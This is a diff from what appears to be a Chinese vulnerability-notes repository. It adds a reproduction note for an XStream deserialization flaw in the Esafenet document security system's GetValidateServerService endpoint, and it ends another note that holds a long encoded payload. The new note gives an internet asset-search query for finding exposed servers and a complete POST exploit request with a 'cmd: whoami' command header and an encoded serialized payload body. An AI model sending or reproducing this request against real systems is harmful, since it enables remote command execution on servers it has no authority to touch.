GEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
+![1703403921443-a5593b7f-a810-4dc7-9a4c-8bbec44133a5.png](./img/Uxwzn6Zr9xGruQMB/1703403921443-a5593b7f-a810-4dc7-9a4c-8bbec44133a5-460992.png)
+
+
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tzche7fhknw2h20w>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统GetValidateServerService存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统GetValidateServerService存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..11d1339
--- /dev/null
+++ b/亿赛通电子文档安全管理系统GetValidateServerService存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统GetValidateServerService存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统GetValidateServerService存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/GYPuv2aIcHAg1WeP/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-723196.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/GetValidateServerService HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHO